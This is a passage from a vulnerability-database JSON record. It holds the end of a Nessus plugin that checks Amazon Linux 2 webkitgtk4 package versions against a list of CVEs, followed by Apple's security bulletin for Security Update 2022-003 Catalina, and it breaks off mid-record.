arbitrary code execution. (CVE-2022-46700)\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free\n vulnerability. This flaw allows attackers with network access to pass specially crafted web content files,\n causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205\n security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux\n 9.2. (CVE-2023-2203)\n\n - The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.2, macOS\n Monterey 12.6.3, tvOS 16.3, Safari 16.3, watchOS 9.3, iOS 16.3 and iPadOS 16.3, macOS Big Sur 11.7.3.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2023-23517,\n CVE-2023-23518)\n\n - A type confusion issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.2.1,\n iOS 16.3.1 and iPadOS 16.3.1, Safari 16.3. Processing maliciously crafted web content may lead to\n arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..\n (CVE-2023-23529)\n\n - A use-after-free vulnerability in WebCore::RenderLayer::addChild in WebKitGTK before 2.36.8 allows\n attackers to execute code remotely. (CVE-2023-25358)\n\n - A use-after-free vulnerability in WebCore::RenderLayer::renderer in WebKitGTK before 2.36.8 allows\n attackers to execute code remotely. (CVE-2023-25360)\n\n - A use-after-free vulnerability in WebCore::RenderLayer::setNextSibling in WebKitGTK before 2.36.8 allows\n attackers to execute code remotely. (CVE-2023-25361)\n\n - A use-after-free vulnerability in WebCore::RenderLayer::repaintBlockSelectionGaps in WebKitGTK before\n 2.36.8 allows attackers to execute code remotely. (CVE-2023-25362)\n\n - A use-after-free vulnerability in WebCore::RenderLayer::updateDescendantDependentFlags in WebKitGTK before\n 2.36.8 allows attackers to execute code remotely. (CVE-2023-25363)\n\n - This issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.3, tvOS\n 16.4, watchOS 9.4, Safari 16.4, iOS 16.4 and iPadOS 16.4. Processing maliciously crafted web content may\n bypass Same Origin Policy (CVE-2023-27932)\n\n - The issue was addressed by removing origin information. This issue is fixed in macOS Ventura 13.3, iOS\n 15.7.4 and iPadOS 15.7.4, tvOS 16.4, watchOS 9.4, Safari 16.4, iOS 16.4 and iPadOS 16.4. A website may be\n able to track sensitive user information (CVE-2023-27954)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura\n 13.3.1, iOS 16.4.1 and iPadOS 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1. Processing maliciously\n crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may\n have been actively exploited. (CVE-2023-28205)\n\n - An out-of-bounds read was addressed with improved input validation. (CVE-2023-28204)\n\n - A use-after-free issue was addressed with improved memory management. (CVE-2023-32373)\n\n - The issue was addressed with improved bounds checks. (CVE-2023-32409)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2023-2088.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-22592.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-27918.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-29623.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-1765.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-1788.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-1789.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-1799.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-1801.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-1817.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-1820.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-1825.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-1826.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-1844.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-1870.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-21775.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-21779.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-21806.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30661.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30663.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30665.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30666.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30682.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30689.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30720.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30734.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30744.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30749.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30758.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30761.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30762.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30795.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30797.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30799.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30809.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30818.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30836.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30846.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30848.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30849.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30851.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30887.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30888.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30889.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30890.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30934.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30936.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30951.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30952.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30953.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30954.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-30984.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-32912.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-42762.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-45481.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-45482.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-45483.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-22590.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-22592.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-22662.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-22677.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-26700.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-26709.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-26710.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-26716.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-26717.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-26719.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-30293.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-32792.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-32793.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-32816.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-32885.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-32888.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-32923.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-42799.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-42824.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-42826.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-42852.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-42856.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-42863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-42867.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-46691.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-46692.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-46698.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-46699.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-46700.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-2203.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-23517.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-23518.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-23529.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-25358.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-25360.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-25361.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-25362.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-25363.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-27932.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-27954.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-28204.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-28205.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-32373.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2023-32409.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/faqs.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update webkitgtk4' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-30954\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1870\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:webkitgtk4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:webkitgtk4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:webkitgtk4-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:webkitgtk4-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'webkitgtk4-2.38.5-3.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-2.38.5-3.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-2.38.5-3.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-debuginfo-2.38.5-3.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-debuginfo-2.38.5-3.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-debuginfo-2.38.5-3.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-devel-2.38.5-3.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-devel-2.38.5-3.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-devel-2.38.5-3.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-jsc-2.38.5-3.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-jsc-2.38.5-3.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-jsc-2.38.5-3.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-jsc-devel-2.38.5-3.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-jsc-devel-2.38.5-3.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkitgtk4-jsc-devel-2.38.5-3.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4 / webkitgtk4-debuginfo / webkitgtk4-devel / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}], "apple": [{"lastseen": "2023-08-26T22:43:41", "description": "# About the security content of Security Update 2022-003 Catalina\n\nThis document describes the security content of Security Update 2022-003 Catalina.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## Security Update 2022-003 Catalina\n\nReleased March 14, 2022\n\n**AppKit**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2022-22665: Lockheed Martin Red Team\n\nEntry added May 25, 2022\n\n**AppleGraphicsControl**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22631: Wang Yu of cyberserval\n\nEntry updated May 25, 2022\n\n**AppleScript**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to read restricted memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22648: Mickey Jin (@patch1t) of Trend Micro\n\nEntry updated May 25, 2022\n\n**AppleScript**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2022-22627: Qi Sun and Robert Ai of Trend Micro\n\nCVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22597: Qi Sun and Robert Ai of Trend Micro\n\n**BOM**\n\nAvailable for: macOS Catalina\n\nImpact: A maliciously crafted ZIP archive may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)\n\n**CUPS**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-26691: Joshua Mason of Mandiant\n\nEntry added May 25, 2022\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2022-46706: Wang Yu of cyberserval, and Pan ZhenPeng (@Peterpan0927) of Alibaba Security Pandora Lab\n\nEntry added June 8, 2023\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2022-22661: Wang Yu of cyberserval, and Pan ZhenPeng (@Peterpan0927) of Alibaba Security Pandora Lab\n\nEntry updated May 25, 2022, updated June 8, 2023 \n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22613: an anonymous researcher, Alex\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22615: an anonymous researcher\n\nCVE-2022-22614: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2022-22638: derrek (@derrekr6)\n\n**Login Window**\n\nAvailable for: macOS Catalina\n\nImpact: A person with access to a Mac may be able to bypass Login Window\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22647: Yuto Ikeda of Kyushu University\n\nEntry updated May 25, 2022\n\n**LoginWindow**\n\nAvailable for: macOS Catalina\n\nImpact: A local attacker may be able to view the previous logged in user\u2019s desktop from the fast user switching screen\n\nDescription: An authentication issue was addressed with improved state management.\n\nCVE-2022-22656\n\n**MobileAccessoryUpdater**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2022-22672: Siddharth Aeri (@b1n4r1b01)\n\nEntry added May 25, 2022\n\n**PackageKit**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious app with root privileges may be able to modify the contents of system files\n\nDescription: An issue in the handling of symlinks was addressed with improved validation.\n\nCVE-2022-26688: Mickey Jin (@patch1t) of Trend Micro\n\nEntry added May 25, 2022\n\n**PackageKit**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22617: Mickey Jin (@patch1t)\n\n**QuickTime Player**\n\nAvailable for: macOS Catalina\n\nImpact: A plug-in may be able to inherit the application's permissions and access user data\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22650: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**WebKit**\n\nAvailable for: macOS Catalina\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\nEntry added May 25, 2022\n\n**WebKit**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted mail message may lead to running arbitrary javascript\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu of Palo Alto Networks (paloaltonetworks.com)\n\nEntry added May 25, 2022\n\n**WebKit**\n\nAvailable for: macOS Catalina\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nWebKit Bugzilla: 232748 \nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\n**xar**\n\nAvailable for: macOS Catalina\n\nImpact: A local user may be able to write arbitrary files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2022-22582: Richard Warren of NCC Group\n\n\n\n## Additional recognition\n\n**Intel Graphics Driver**\n\nWe would like to acknowledge Jack Dates of RET2 Systems, Inc., Yinyi Wu (@3ndy1) for their assistance.\n\n**syslog**\n\nWe would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for their assistance.\n\n**TCC**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: June 08, 2023\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "apple", "title": "About the security content of Security Update 2022-003 Catalina", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 